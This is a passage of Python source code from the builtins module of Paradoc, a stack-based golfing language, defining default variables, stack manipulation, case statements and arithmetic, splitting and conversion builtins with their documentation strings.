fail_if_overwrite=True)\n return builtin\n\n # Default variables {{{\n env.put('N', '\\n', docs=\"Output record separator\", stability=\"stable\")\n env.put('A', 10, docs=\"Utility constant: ten\", stability=\"stable\")\n env.put('¹', 11, docs=\"Utility constant: eleven\", stability=\"unstable\")\n env.put(u'Ñ', '', docs=\"Output field separator\", stability=\"stable\")\n env.put('Ee', math.e, stability=\"beta\")\n env.put('Ep', 1e-9, docs=\"Epsilon for approximate tests\", stability=\"beta\")\n env.put('Pi', math.pi, stability=\"stable\")\n\n golden_ratio = (1 + math.sqrt(5)) / 2\n env.put('Ph', golden_ratio, docs=\"Golden ratio\", stability=\"alpha\")\n env.put('Phi', golden_ratio, 
stability=\"alpha\")\n\n env.put('Da', str_class('0-9'), docs=\"Digit alphabet\", stability=\"alpha\")\n env.put('Ua', str_class('A-Z'), docs=\"Uppercase alphabet\", stability=\"alpha\")\n env.put('La', str_class('a-z'), docs=\"Lowercase alphabet\", stability=\"alpha\")\n env.put('Aa', str_class('A-Za-z'), docs=\"Alphabet\", stability=\"alpha\")\n\n # Non-breaking space (U+00A0)\n env.put('\\xa0', Char(' '), docs=\"Utility constant: space\", stability=\"alpha\")\n env.put('␣', Char(' '), docs=\"Utility constant: space\", stability=\"alpha\")\n\n env.put('Å', str_class('A-Z'), docs=\"Uppercase alphabet alias\", stability=\"alpha\")\n env.put('Åa', str_class('a-zA-Z'), stability=\"alpha\")\n env.put('Åb', case_double('BCDFGHJKLMNPQRSTVWXZ'), stability=\"alpha\")\n env.put('Åc', case_double('BCDFGHJKLMNPQRSTVWXYZ'), stability=\"alpha\")\n env.put('Åd', str_class('9-0'), stability=\"alpha\")\n env.put('Åf', str_class('A-Za-z0-9+/'), stability=\"alpha\")\n env.put('Åh', str_class('0-9A-F'), stability=\"alpha\")\n env.put('Åi', str_class('A-Za-z0-9_'), stability=\"alpha\")\n env.put('Åj', str_class('a-zA-Z0-9_'), stability=\"alpha\")\n env.put('Ål', str_class('z-a'), stability=\"alpha\")\n env.put('Åm', '()<>[]{}', stability=\"alpha\")\n env.put('Åp', str_class(' -~'), stability=\"alpha\")\n env.put('Åq', case_double('QWERTYUIOP'), stability=\"alpha\")\n env.put('Ås', case_double('ASDFGHJKL'), stability=\"alpha\")\n env.put('Åt', str_class('0-9A-Z'), stability=\"alpha\")\n env.put('Åu', str_class('Z-A'), stability=\"alpha\")\n env.put('Åv', case_double('AEIOU'), stability=\"alpha\")\n env.put('Åx', case_double('ZXCVBNM'), stability=\"alpha\")\n env.put('Åy', case_double('AEIOUY'), stability=\"alpha\")\n env.put('Åz', str_class('z-aZ-A'), stability=\"alpha\")\n\n env.put('Debug', int(debug),\n docs=\"\"\"A variable tested to see whether debugging output in the\n program should be enabled.\"\"\",\n stability=\"alpha\")\n\n env.put('\\x00', 0, stability=\"unstable\")\n env.put('∅', 0, stability=\"unstable\")\n env.put('\\x01', 1, stability=\"unstable\")\n env.put('α', 1, stability=\"unstable\")\n\n env.put('Hw', 'Hello, World!', stability=\"unstable\")\n # }}}\n # Bullet variable and hoarding {{{\n BULLET = '•'\n\n env.put(BULLET, Hoard(),\n docs=\"\"\"A utility variable assigned to by {{ 'Assign_bullet'|b }}\n and {{ 'Assign_bullet_destructive'|b }}. 
Initialized to a new\n hoard.\"\"\",\n stability=\"alpha\")\n\n env.put('H', Hoard(), docs=\"An empty Hoard\", stability=\"alpha\")\n\n def hoardify(env: Environment, prefix: str) -> None:\n env.delete_starting_with(prefix)\n env.put(prefix, Hoard())\n\n # closure binding shenanigans\n def add_hoardify_builtin(c: str) -> None:\n long_name = 'Hoardify_' + c.lower() # Hoardify_a, etc\n short_name = c + 'h' # Ah, etc\n builtin = BuiltIn(long_name,\n lambda env: hoardify(env, c),\n aliases=[short_name],\n docs=\"\"\"Hoardify the {c} variable: delete all variables starting\n with {c} and set {c} to a new empty hoard.\"\"\".format(c=c),\n stability=\"alpha\")\n env.put(long_name, builtin, fail_if_overwrite=True)\n env.put(short_name, builtin, fail_if_overwrite=True)\n\n for c in 'ABCD': add_hoardify_builtin(c)\n # }}}\n # Universal functions: stack stuff, list stuff {{{\n\n @put('Nop', ' ', '\\t', '\\n', '\\r',\n docs=\"Do nothing.\", stability=\"stable\")\n def nop(env: Environment) -> None: pass\n\n # @put('Dup', ':')\n # def dup(env: Environment) -> None:\n # a = env.pop()\n # env.push(a, a)\n cput('Dup', [':'], [Case.any(lambda env, x: [x, x])],\n docs=\"\"\"Duplicate the top element of the stack.\n\n ex: 1 2 3 : => 1 2 3 3\"\"\",\n stability=\"stable\")\n cput('Dup_pair', [':p', '¦'], [Case.any2(lambda env, a, b: [a, b, a, b])],\n docs=\"\"\"Duplicate the top two elements of the stack: a b -> a b a b\n\n ex: 1 2 3 :p => 1 2 3 2 3\"\"\",\n stability=\"beta\")\n cput('Dup_out', [':o'], [Case.any2(lambda env, a, b: [a, b, a])],\n docs=\"\"\"Duplicate the second element of the stack onto the top: a b\n -> a b a\n\n ex: 1 2 3 :o => 1 2 3 2\"\"\",\n stability=\"alpha\")\n cput('Swap', ['\\\\'], [Case.any2(lambda env, a, b: [b, a])],\n docs=\"\"\"Swap the top two elements of the stack.\n\n ex: 1 2 3\\ => 1 3 2\"\"\",\n stability=\"stable\")\n cput('Swap_around', ['\\\\a'], [Case.any3(lambda env, a, b, c: [c, b, a])],\n docs=\"\"\"Swap the first and third elements of the stack (swap\n \"around\" the second one).\n\n ex: 1 2 3\\\\a => 3 2 1\"\"\",\n stability=\"alpha\")\n cput('Swap_out', ['\\\\o'], [Case.any3(lambda env, a, b, c: [b, c, a])],\n docs=\"\"\"Rotate the top three elements of the stack so that the 3rd\n from the top is now on top (\"outward\" by two): a b c -> b c a\n\n ex: 1 2 3\\\\o => 2 3 1\"\"\",\n stability=\"beta\")\n cput('Swap_in', ['\\\\i'], [Case.any3(lambda env, a, b, c: [c, a, b])],\n docs=\"\"\"Rotate the top three elements of the stack so that the\n top is now on bottom (\"inward\" by two): a b c -> c a b\n\n ex: 1 2 3\\\\i => 3 1 2\"\"\",\n stability=\"beta\")\n cput('Pop', [';'], [Case.any(lambda env, x: [])],\n docs=\"\"\"Pop the top element of the stack.\n\n ex: 1 2 3; => 1 2\"\"\",\n stability=\"stable\")\n cput('Pop_under', ['¸'], [Case.any2(lambda env, x, y: [y])],\n docs=\"\"\"Pop the second from the top element of the stack.\n\n ex: 1 2 3¸ => 1 3\"\"\",\n stability=\"beta\")\n cput('Pop_out', [';o'], [Case.any3(lambda env, x, y, z: [y, z])],\n docs=\"\"\"Pop the third from the top element of the stack, named to\n be somewhat analogous to {{ '\\\\\\\\o'|b }}.\n\n ex: 1 2 3;o => 2 3\"\"\",\n stability=\"unstable\")\n cput('Pop_around', [';a'], [Case.any3(lambda env, x, y, z: [y])],\n docs=\"\"\"Pop the first and third from the top elements of the stack,\n named to be somewhat analogous to {{ '\\\\\\\\a'|b }}.\n\n ex: 1 2 3;a => 2\"\"\",\n stability=\"unstable\")\n cput('Pop_second_pair', [';p'], [Case.any3(lambda env, x, y, z: [z])],\n docs=\"\"\"Pop the second and 
third from the top elements of the\n stack. Not the first and second because that's\n {{ ';'|b }}{{ 'd'|bt }}.\n\n ex: 1 2 3;p => 3\"\"\",\n stability=\"unstable\")\n cput('Repr', ['`'], [Case.any(lambda env, x: [pd_repr(x)])],\n docs=\"Push the string Paradoc representation of the top element.\",\n stability=\"beta\")\n\n # Pop-if-boolean variants {{{\n # TODO: There are almost certainly better block semantics.\n cput('Pop_if_true', [';t'], [Case.any(lambda env, x: [] if x else [x])],\n docs=\"\"\"Look at the top element of the stack. Pop it if it's\n truthy.\"\"\",\n stability=\"alpha\")\n cput('Pop_if_false', [';f'], [Case.any(lambda env, x: [x] if x else [])],\n docs=\"\"\"Look at the top element of the stack. Pop it if it's\n falsy.\"\"\",\n stability=\"alpha\")\n cput('Pop_if', [';i'], [Case.any2(lambda env, x, y: [] if y else [x])],\n docs=\"\"\"Pop the top element of the stack. Pop the second element if\n the first element was truthy.\"\"\",\n stability=\"alpha\")\n cput('Pop_if_not', [';n'], [Case.any2(lambda env, x, y: [x] if y else [])],\n docs=\"\"\"Pop the top element of the stack. Pop the second element if\n the first element was falsy.\"\"\",\n stability=\"alpha\")\n # }}}\n\n @put('[', 'Mark', docs=\"Mark the stack.\", stability=\"stable\")\n def mark(env: Environment) -> None:\n env.mark_stack()\n @put(']', 'Pack',\n docs=\"Pack the elements above the last stack mark into a list.\",\n stability=\"stable\")\n def pack(env: Environment) -> None:\n env.push(env.pop_until_stack_marker())\n @put('¬', 'Pack_reverse', 'Pack_down',\n docs=\"\"\"Pack the elements above the last stack mark into a list in\n reverse order.\n\n ex: [1 2 3¬ => [3 2 1]\"\"\",\n stability=\"stable\")\n def pack_reverse(env: Environment) -> None:\n env.push(env.pop_until_stack_marker()[::-1])\n\n def check_against(condition: PdObject, target: PdObject) -> bool:\n if isinstance(condition, Block):\n return pd_sandbox_truthy(env, condition, [target])\n else:\n return target == condition\n\n @put(']_case', ']c',\n docs=\"\"\"Case statement: Takes a series of lists, the \"cases\",\n above the last stack mark, as well as one object, the \"target\",\n below the mark, which is popped. Then, find the first \"case\" such\n that the case \"matches\" the target, where \"matches\" means that if\n the case's first element is a block then the target must satisfy\n it, and otherwise they must be equal. 
Push or execute all\n remaining list elements in that first matching case.\"\"\",\n stability=\"beta\")\n def stack_marker_case(env: Environment) -> None:\n case_list = env.pop_until_stack_marker()\n target = env.pop()\n for case in case_list:\n if isinstance(case, list):\n if case:\n condition, *result = case\n\n if check_against(condition, target):\n env.push_or_eval(*result)\n break\n else:\n raise AssertionError('Empty case')\n else:\n raise AssertionError('Non-list case')\n @put(']_stream', ']s',\n docs=\"\"\"Stream case statement: Like the case statement, but just\n takes a series of alternative case predicates and case bodies\n instead of expecting them to be paired up.\"\"\",\n stability=\"alpha\")\n def stack_marker_stream(env: Environment) -> None:\n case_list = env.pop_until_stack_marker()\n target = env.pop()\n for condition, result in zip(case_list[::2], case_list[1::2]):\n if check_against(condition, target):\n env.push_or_eval(result)\n break\n @put(']_index', ']i',\n docs=\"\"\"Index case statement: Takes a series of \"cases\",\n above the last stack mark, as well as one object, the \"target\",\n below the mark, which is popped. Cyclically index the target into\n the list of cases. Push or execute that case.\"\"\",\n stability=\"beta\")\n def index_marker_case(env: Environment) -> None:\n case_list = env.pop_until_stack_marker()\n target = env.pop()\n env.push_or_eval(case_list[num.intify(target) % len(case_list)])\n\n @put(']_check',\n docs=\"\"\"Stack check: Takes a series of case predicates above the\n last stack mark. Peek at the same number of objects on the same\n stack below them. Assert that every object matches the\n corresponding predicate; otherwise, halt the program.\"\"\",\n stability=\"alpha\")\n def stack_marker_check(env: Environment) -> None:\n check_list = env.pop_until_stack_marker()\n n = len(check_list)\n failures = []\n for i, condition in enumerate(reversed(check_list)):\n target = env.index_stack_or_none(i)\n if target is None:\n failures.append('- {} ({} from top) of {}: not enough objects on stack for {}'.format(n - i, i, n, condition))\n elif not check_against(condition, target):\n failures.append('- {} ({} from top) of {}: condition {} not satisfied by target {}'.format(n - i, i, n, condition, target))\n\n if failures:\n msg = '\\n'.join(['Stack check failed!'] + list(reversed(failures)))\n print(msg, file=sys.stderr)\n raise PdExitException(msg, 1)\n\n cput('†', [], [Case.any(lambda env, x: [[x]])],\n docs=\"\"\"Pack the top element of the stack into a list by itself.\n\n ASCII alternative: 1_array; see {{ 'array'|it }}.\n\n ex: 1 2 3† => 1 2 [3]\"\"\",\n stability=\"stable\")\n cput('‡', [], [Case.any2(lambda env, x, y: [[x, y]])],\n docs=\"\"\"Pack the top two elements of the stack into a list.\n\n ASCII alternative: 2_array; see {{ 'array'|it }}.\n\n ex: 1 2 3‡ => 1 [2 3]\"\"\",\n stability=\"stable\")\n # }}}\n # Not {{{\n basic_not_case = Case.value(lambda env, x: [int(not x)])\n basic_not = cput('Not', [], [basic_not_case],\n docs=\"\"\"Logical NOT: 0 and empty lists/strings yield 1, everything else yields 0.\n\n ex: 0! => 1\n 1! => 0\n 2! => 0\n []! => 1\n [0]! 
=> 0\"\"\",\n stability=\"stable\", golf_aliases=['!'])\n\n cput('!', [], [basic_not_case, Case.block(lambda env, block: [CompositionBlock(block, basic_not)])],\n docs=\"\"\"Logical {{ 'Not'|b }}: 0 and empty lists/strings yield 1, everything else yields 0.\n Or postcompose a logical NOT onto a block (not recursively though).\"\"\",\n stability=\"stable\")\n # }}}\n # \"Arithmetic\" {{{\n\n # \"Addition\" (concatenation, filtering, etc.) {{{\n add_case = Case.number2(lambda env, a, b: [num.pd_add(a, b)])\n cat_list_case = Case.list2_singleton(lambda env, a, b: [pd_to_list(a) + pd_to_list(b)])\n strcat_list_case = Case.seq2_singleton(lambda env, a, b: [env.pd_str(a) + env.pd_str(b)])\n filter_case = Case.block_seq_range(lambda env, block, seq: [pd_filter(env, block, seq)])\n compose_case = Case.block2(lambda env, block1, block2: [CompositionBlock(block1, block2)])\n cput('Plus', [], [add_case], docs=\"Add numbers.\", stability=\"stable\", golf_aliases=['+'])\n cput('Cat', [], [cat_list_case], docs=\"Concatenate two lists (numbers coerce to single-element lists).\", stability=\"stable\", golf_aliases=['+'])\n cput('Strcat', [], [strcat_list_case], docs=\"Concatenate two strings (numbers coerce to strings).\", stability=\"stable\", golf_aliases=['+'])\n cput('Filter', [], [filter_case], docs=\"Filter a list by a block (numbers coerce to ranges).\", stability=\"stable\", golf_aliases=['+'])\n cput('Compose', [], [compose_case], docs=\"Compose two blocks together.\", stability=\"alpha\", golf_aliases=['+'])\n cput('Plus_or_filter_or_compose', ['+', 'Plus_or_filter'], [add_case, cat_list_case, strcat_list_case, filter_case, compose_case],\n docs=\"\"\"Addition on numbers. Concatenation on lists and strings\n (numbers coerce to single-element lists or to strings). Filter on\n block and list (numbers coerce to ranges). Compose on blocks.\"\"\",\n stability=\"stable\")\n\n cput('Cat_between', ['Cb'], [\n Case.list2_singleton(lambda env, a, b: [pd_to_list(a) + pd_to_list(b) + pd_to_list(a)]),\n Case.seq2_singleton(lambda env, a, b: [env.pd_str(a) + env.pd_str(b) + env.pd_str(a)]),\n ],\n docs=\"\"\"two copies of a with b between: a, b -> a + b + a. Numbers\n coerce to single-element lists.\"\"\",\n stability=\"unstable\")\n cput('Cat_flank', ['Cf'], [\n Case.list2_singleton(lambda env, a, b: [pd_to_list(b) + pd_to_list(a) + pd_to_list(b)]),\n Case.seq2_singleton(lambda env, a, b: [env.pd_str(b) + env.pd_str(a) + env.pd_str(b)]),\n ],\n docs=\"\"\"a with two copies of b flanking: a, b -> b + a + b. Numbers\n coerce to single-element lists.\"\"\",\n stability=\"unstable\")\n # }}}\n # \"Subtraction\" (set subtraction, rejection, etc.) {{{\n minus_case = Case.number2(lambda env, a, b: [num.pd_sub(a, b)])\n reject_in_case = Case.seq2_singleton(lambda env, a, b: [pd_seq_difference(a, b)])\n reject_case = Case.block_seq_range(lambda env, block, seq: [pd_filter(env, block, seq, negate=True)])\n cput('Minus', [], [minus_case], docs=\"Subtract numbers.\", stability=\"stable\", golf_aliases=['-'])\n cput('Filter_not_in', ['Reject_in'], [reject_in_case],\n docs=\"Filter-not-in on lists and strings (numbers coerce to single-element lists).\",\n stability=\"stable\",\n golf_aliases=['-'])\n cput('Filter_not', ['Reject'], [reject_case],\n docs=\"Filter-not a list by a block (numbers coerce to ranges).\",\n stability=\"stable\"\n ,golf_aliases=['-'])\n cput('Minus_or_reject', ['-'], [minus_case, reject_in_case, reject_case],\n docs=\"\"\"Subtraction on numbers. 
Filter-not-in on lists and strings\n (numbers coerce to single-element lists). Filter-not on block and\n list (numbers coerce to ranges). See also {{ 'Antiminus'|b }}.\"\"\",\n stability=\"stable\",\n golf_aliases=['-'])\n\n cput('Antiminus', ['¯'], [\n Case.number2(lambda env, a, b: [num.pd_sub(b, a)]),\n Case.seq2_singleton(lambda env, a, b: [pd_seq_difference(b, a)]),\n Case.block_seq_range(lambda env, block, seq: [pd_filter(env, block, seq, negate=True)]),\n ],\n docs=\"\"\"Reversed subtraction. Compare\n {{ 'Minus_or_reject'|b }}.\"\"\",\n stability=\"beta\")\n # }}}\n # \"Multiplication\" (cartesian products, loops, etc.) {{{\n cput('Table', ['T'], [\n Case.seq2_range(lambda env, a, b: [pd_cartesian_product_seq_matrix(a, b)]),\n Case.seq2_range_block(lambda env, seq1, seq2, block:\n [pd_map_cartesian_product(env, block, seq1, seq2, flat=False)]),\n ],\n docs=\"\"\"On two sequences (numbers coerce to ranges), \"structured\"\n Cartesian product: make a \"table\", or a list of lists, of pairs of\n elements. On a block and two sequences (numbers coerce to ranges),\n make a \"table\" of results of mapping pairs of elements. For the\n flat versions, see {{ '*'|b }} or {{ 'B'|b }}.\"\"\",\n stability=\"alpha\")\n\n cput('Mul_or_xloop', ['*'], [\n Case.number2(lambda env, a, b: [num.pd_mul(a, b)]),\n Case.number_seq(lambda env, n, seq: [pd_mul_seq(seq, n)]),\n Case.seq2(lambda env, a, b: [pd_cartesian_product_seq_flat(a, b)]),\n Case.block_seq_range(lambda env, block, seq:\n pd_foreach_x_only_then_empty_list(env, block, seq)),\n ],\n docs=\"\"\"Multiplication on numbers. Repetition on sequences with\n numbers. \"Flat\" Cartesian product on two sequences (this returns a\n single-level list of pairs, rather than a list of lists of pairs;\n if you want the latter, see {{ 'T'|b }}). X-loop on blocks and\n sequences, in which elements and corresponding indices are pushed\n onto the X-stack, but not pushed onto the stack (numbers coerce to\n ranges, so, if you don't use the variable X, it's just repeating a\n block some number of times.)\n\n See also {{ 'xloop'|bt }}.\n\n ex: 3 {2*} 4* => 48\n {X} 4* => 0 1 2 3\n [2 3 5 7] {2X#} * => 4 8 32 128\"\"\",\n stability=\"beta\")\n # }}}\n # \"Division\" and \"modulo\" (for-each, splitting, etc.) {{{\n cput('Div_or_split_or_each', ['/'], [\n Case.number2(lambda env, a, b: [num.pd_div(a, b)]),\n Case.number_seq(lambda env, n, seq: [pd_split_seq(seq, n, include_leftover=True)]),\n Case.seq2(lambda env, seq, tok: [pd_split_seq_by(seq, tok)]),\n Case.block_seq_range(lambda env, block, seq:\n pd_foreach_then_empty_list(env, block, seq)),\n ],\n docs=\"\"\"Float division on numbers. On a sequence and number, split\n the sequence into chunks of size equal to the number, including\n leftovers if any. On two sequences, split the first sequence around\n occurrences of the second sequence. For-each on blocks and\n sequences (numbers coerce to ranges).\n\n See also {{ 'Intdiv_or_split_discard'|b }}.\n\n ex:\n [1 2 3 4]2/ => [[1 2][3 4]]\n [1 2 3 4 5]2/ => [[1 2][3 4][5]]\n \"tweedledee\"\"e\"/ => [\"tw\" \"\" \"dl\" \"d\" \"\" \"\"]\n \"\"\",\n stability=\"stable\")\n\n 
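# A compact comparison of the splitting flavors defined here and just below\n # (illustrative lines assembled from the surrounding docstrings, not new doctests):\n # [1 2 3 4 5]2/ => [[1 2][3 4][5]] (keep the leftover chunk)\n # [1 2 3 4 5]2÷ => [[1 2][3 4]] (discard the leftover chunk)\n # \"tweedledee\"\"e\"/ => [\"tw\" \"\" \"dl\" \"d\" \"\" \"\"] (keep empty tokens)\n # \"tweedledee\"\"e\"% => [\"tw\" \"dl\" \"d\"] (drop empty tokens)\n\n 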
cput('Intdiv_or_split_discard', ['÷'], [\n Case.number2(lambda env, a, b: [num.pd_intdiv(a, b)]),\n Case.number_seq(lambda env, n, seq: [pd_split_seq(seq, n, include_leftover=False)]),\n ],\n docs=\"\"\"Integer division on numbers. On a sequence and number,\n split the sequence into chunks of size equal to the number,\n discarding leftovers.\n\n ex: [1 2 3 4]2÷ => [[1 2][3 4]]\n [1 2 3 4 5]2÷ => [[1 2][3 4]]\n \"\"\",\n stability=\"beta\")\n\n cput('Mod_or_slice_mod_or_split_nonempty_or_map', ['%'], [\n Case.number2(lambda env, a, b: [num.pd_mod(a, b)]),\n Case.number_seq(lambda env, n, seq: [pd_deref(seq)[::num.intify(n)]]),\n Case.seq2(lambda env, seq, tok: [[s for s in pd_split_seq_by(seq, tok) if s]]),\n Case.block_seq_range(lambda env, block, seq: [pd_map(env, block, seq)]),\n ],\n docs=\"\"\"Modulus on numbers. On a sequence and number, slice\n elements at indices equal to 0 mod the number, just like Python\n s[::n] (negative numbers reverse the sequence). On two sequences,\n split the first sequence around occurrences of the second sequence,\n discarding empty tokens. Map on blocks and sequences (numbers\n coerce to ranges).\n\n ex: \"tweedledee\"\"e\"% => [\"tw\" \"dl\" \"d\"]\n \"\"\",\n stability=\"stable\")\n\n cput('Div_with_zero_as_one', ['/o'], [\n Case.number2(lambda env, a, b: [num.pd_div(a, b) if b else a]),\n ],\n docs=\"\"\"Float division except that if the second argument is 0 it\n just returns the first argument.\"\"\",\n stability=\"unstable\")\n cput('Intdiv_with_zero_as_one', ['÷o'], [\n Case.number2(lambda env, a, b: [num.pd_intdiv(a, b) if b else a]),\n ],\n docs=\"\"\"Integer division except that if the second argument is 0 it\n just returns the first argument.\"\"\",\n stability=\"unstable\")\n\n cput('Positive_biased_balanced_mod', ['%â'], [\n Case.number2(lambda env, a, b: [num.pd_positive_biased_balanced_mod(a, b)]),\n ],\n docs=\"\"\"Balanced mod: on a and b, returns the number that's equal\n to a mod b and as close to 0 as possible, preferring |b|/2 over\n -|b|/2.\"\"\",\n stability=\"unstable\")\n cput('Negative_biased_balanced_mod', ['%û'], [\n Case.number2(lambda env, a, b: [num.pd_negative_biased_balanced_mod(a, b)]),\n ],\n docs=\"\"\"Balanced mod: on a and b, returns the number that's equal\n to a mod b and as close to 0 as possible, preferring -|b|/2 over\n |b|/2.\"\"\",\n stability=\"unstable\")\n\n zip_cases = [\n Case.seq2_range(lambda env, a, b: [pd_zip_as_list(a, b)]),\n Case.seq2_range_block(lambda env, seq1, seq2, block:\n [pd_zip(env, block, seq1, seq2)]),\n ]\n cput('Divmod_or_zip', ['‰', '%p'], [\n Case.number2(lambda env, a, b: [num.pd_intdiv(a, b), num.pd_mod(a, b)]),\n ] + zip_cases,\n docs=\"\"\"On integers, integer division and modulus. On two sequences\n or a block and two sequences, {{ 'Zip'|b }}.\"\"\",\n stability=\"unstable\")\n # }}}\n\n cput('Power', ['ˆ', '*p'], [\n Case.number2(lambda env, a, b: [num.pd_pow(a, b)]),\n Case.number_seq(lambda env, n, s: [pd_pow_seq(s, n)]),\n ],\n docs=\"\"\"On numbers, power/exponentiate. 
On a list and a number,\n exponentiate the list by making a list of all lists of that length\n composed of elements from the original list (possibly repeating).\n \"\"\",\n stability=\"beta\")\n\n cput('Int_sqrt', ['Si'], [\n Case.number(lambda env, a: [num.intify(num.numerify(a) ** 0.5)]),\n ],\n docs=\"\"\"Integer square root.\"\"\",\n stability=\"alpha\")\n\n cput('Find_index', ['@'], [\n Case.number_seq(lambda env, n, seq:\n [pd_find_index(env, n, seq)]),\n Case.seq2(lambda env, haystack, needle:\n [pd_find_substring_index(env, needle, haystack)]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_get_index(env, block, seq)]),\n ],\n docs=\"\"\"Inside a sequence (numbers coerce to ranges), find the\n first index of an element, a substring, or something satisfying a\n block. Mnemonic: finds where the element is AT.\"\"\",\n stability=\"beta\")\n\n abs_diff_case = Case.number2(lambda env, a, b: [num.pd_abs(num.pd_sub(a, b))])\n cput('Abs_diff', ['Ad'], [abs_diff_case],\n docs=\"\"\"Absolute difference of two numbers.\"\"\",\n stability=\"stable\", golf_aliases=['±'])\n\n filter_and_reject_case = Case.block_seq_range(lambda env, block, seq:\n list(pd_filter_and_reject(env, block, seq)))\n cput('±', [], [abs_diff_case, filter_and_reject_case],\n docs=\"\"\"On two numbers, absolute difference (mnemonic: + is\n for \"positive\" and - is for \"difference\".) On a list and a block,\n filter-and-reject: push the list of elements on which the predicate\n is true and the list of elements on which the predicate is\n false.\"\"\",\n stability=\"stable\")\n\n cput('Clamped_subtract', ['-c'], [\n Case.number2(lambda env, a, b: [pd_max(num.pd_sub(a, b), 0)]),\n ],\n docs=\"\"\"Subtraction clamped to zero, or saturating subtraction: the\n maximum of the subtraction or 0.\"\"\",\n stability=\"unstable\")\n\n cput('Plus_ints', ['+i'], [\n Case.int2_coerce(lambda env, a, b: [a + b]),\n ],\n docs=\"\"\"Add two things after coercing both to integers. 
\"\"\",\n stability=\"alpha\")\n cput('Plus_lengths', ['+l'], [\n Case.number2_len(lambda env, a, b: [num.pd_add(a, b)]),\n ],\n docs=\"\"\"Add two things after coercing both to ints or floats,\n sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('Minus_ints', ['-i'], [\n Case.int2_coerce(lambda env, a, b: [a - b]),\n ],\n docs=\"\"\"Subtract two things after coercing both to integers.\"\"\",\n stability=\"unstable\")\n cput('Minus_lengths', ['-l'], [\n Case.number2_len(lambda env, a, b: [num.pd_sub(a, b)]),\n ],\n docs=\"\"\"Subtract two things after coercing both to ints or floats,\n sequences by taking their length.\"\"\",\n stability=\"unstable\")\n # }}}\n # Dictionary, translate, whatever {{{\n cput('Dictionary', ['Dc'], [\n Case.seq(lambda env, seq: [Hoard.dictionary_from_general_iterable(pd_iterable(seq))]),\n ],\n docs=\"\"\"Convert to new dictionary hoard.\"\"\",\n stability=\"unstable\")\n\n cput('Index_translate', ['It'], [\n Case.seq2_singleton(lambda env, seq, table: [pd_index_translate(seq, table)]),\n ],\n docs=\"\"\"Translate the first argument by indexing into the second.\"\"\",\n stability=\"unstable\")\n cput('Translate', ['Zt'], [\n Case.seq3_singleton(lambda env, seq, src, tgt: [pd_translate(seq, src, tgt)]),\n ],\n docs=\"\"\"Translate the first argument using a mapping obtained by\n zipping the second and third, mapping elements of the second to\n elements of the third, repeating the last element of the third as\n necessary.\"\"\",\n stability=\"alpha\")\n cput('One_time_translate', ['Ot'], [\n Case.seq3_singleton(lambda env, seq, src, tgt: [pd_one_time_translate(seq, src, tgt)]),\n ],\n docs=\"\"\"Translate the first argument using a mapping obtained by\n zipping the second and third, repeating the last element of the\n third as necessary. Each entry in the mapping is used at most once,\n in the order they appear.\"\"\",\n stability=\"alpha\")\n # }}}\n # Acute/grave vowels {{{\n cput('Plus_deep_vectorizing', ['Á'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_add, a, b)]),\n ],\n docs=\"\"\"Addition on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Minus_deep_vectorizing', ['À'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_sub, a, b)]),\n ],\n docs=\"\"\"Subraction on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Two_power_vectorizing', ['É'], [Case.value_n2v(lambda e: 2**e)],\n docs=\"\"\"Two to the power of numbers. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Square_deep', ['È'], [Case.value_n2v(lambda e: e**2)],\n docs=\"\"\"Square of numbers. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Inverse', ['Í'], [Case.value_n2v(lambda e: 1/e)],\n docs=\"\"\"Inverse (reciprocal) of numbers. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Negate_deep', ['Ì'], [Case.value_n2v(lambda e: -e)],\n docs=\"\"\"Negate numbers. 
Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Multiply_deep_vectorizing', ['Ó'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_mul, a, b)]),\n ],\n docs=\"\"\"Multiplication on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Divide_deep_vectorizing', ['Ò'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_div, a, b)]),\n ],\n docs=\"\"\"Division on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Modulus_deep_vectorizing', ['Ú'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_mod, a, b)]),\n ],\n docs=\"\"\"Modulus on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n # }}}\n # Conversions / loopy things: C, F, I, S {{{\n to_char_case = Case.value(lambda env, a: [pd_to_char(a)])\n to_float_case = Case.value(lambda env, a: [pd_to_float(a)])\n to_int_case = Case.value(lambda env, a: [pd_to_int(a)])\n to_string_case = Case.value(lambda env, a: [env.pd_str(a)])\n\n cput('To_char', [ ], [to_char_case ], docs=\"Convert to char\", stability=\"beta\", golf_aliases=['C'])\n cput('To_float', [ ], [to_float_case ], docs=\"Convert to float\", stability=\"beta\", golf_aliases=['F'])\n cput('To_int', [ ], [to_int_case ], docs=\"Convert to int\", stability=\"beta\", golf_aliases=['I'])\n cput('To_string', ['S'], [to_string_case], docs=\"Convert to string\", stability=\"beta\")\n\n cput('Imaginary_part', [';j'], [Case.value_n2v(lambda e: e.imag)], stability=\"unstable\", docs=\"Imaginary part. Deeply vectorizes because why not. Mnemonic: deletes part of the complex number like {{ ';'|b }}. Keeps the imaginary part rather than deleting it because direct conversion to float, {{ 'F'|b }}, already computes the real part.\")\n cput('Complex_components', ['~j'], [Case.number(lambda _env, e: [e.real, e.imag])], stability=\"unstable\", docs=\"Real and imaginary part, as two elements on the stack. Mnemonic: Treating the complex number as a length-2 list, this expands it like {{ '~'|b }}.\")\n cput('Complex_components_array', ['Aj'], [Case.number(lambda _env, e: [[e.real, e.imag]])], stability=\"unstable\", docs=\"Real and imaginary part, as a list of two elements on the stack. Mnemonic: A for array as usual.\")\n cput('Reduce_complex', ['Rj'], [Case.value(lambda env, e: [pd_deep_reduce_complex(e)])], stability=\"unstable\", docs=\"Create a complex number for a list with a real and imaginary part. Actually, for a full list, multiplies successive elements by powers of 1j and computes the sum of all the results. Mnemonic: This is shaped like a reduce because it takes a list and returns a single number.\")\n cput('+j', [], [Case.number2(lambda env, a, 